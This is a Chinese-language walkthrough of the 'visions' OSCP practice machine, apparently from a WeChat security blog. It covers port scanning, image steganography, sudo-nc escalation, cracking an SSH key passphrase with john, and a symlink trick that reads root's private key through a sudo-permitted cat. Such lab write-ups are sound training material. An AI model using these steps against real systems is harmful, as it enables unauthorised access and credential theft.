OSCP 靶场
靶场介绍
|
visions |
easy |
图片隐写、图片调试、exiftool使用、sudo-nc提权、ssh私钥提权、ssh2john使用、john爆破私钥、ssh 私钥利用 |
信息收集
主机发现
端口扫描
└─# nmap -sV -A -p- -T4 192.168.1.216
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-02 20:35 EST
Nmap scan report for 192.168.1.216
Host is up (0.00056s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 85:d0:93:ff:b6:be:e8:48:a9:2c:86:4c:b6:84:1f:85 (RSA)
| 256 5d:fb:77:a5:d3:34:4c:46:96:b6:28:a2:6b:9f:74:de (ECDSA)
|_ 256 76:3a:c5:88:89:f2:ab:82:05:80:80:f9:6c:3b:20:9d (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:64:6D:AC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
打开只有一张白图片,还有一段话。
目录扫描
权限获取
通过上面网站的提示,查看图片隐写发现存在密码,接着使用alicia 账号登录成功,获取权限。
查看passwd 和 home 发现存在多个账号。
权限提升
sudo-nc 提权
这里通过sudo 提权到emma账号
图片分析
这里提权到其他用户遇到了难题,后面发现通过调整图片曝光度之后,发现存在账号密码
https://pixlr.com/cn/express/
成功获取第一个flag
ssh 私钥提权
查看获取ssh私钥
这登录还需要密码,我们使用 ssh2john 将 id_isa 秘钥信息 转换 为 john 可以识别的hash,然后进行爆破
通过john 爆破私钥获取密码
ssh -i id_rsa [email protected]
软链接提权
这里 sudo 具有root 的权限,sophia 用户具有使用 Sudo 读取 /home/isabella/.invisible 的权限,而现在的 isabella 用户有权限修改 /home/isabella/.invisible。我们尝试创建一条软链接,将.invisiblla文件链接到root的私钥上
isabella@visions:~$ rm -rf ./.invisible
isabella@visions:~$ ln -s /root/.ssh/id_rsa ./.invisible
创建后成功读取到root 的私钥
sophia@visions:~$ sudo /usr/bin/cat /home/isabella/.invisible
shadow爆破
使用上面的方法,换个思路,读取root的shadow 文件,然后进行爆破
这里太久了,了解思路即可。完全爆破需要很长时间。
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】visions
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论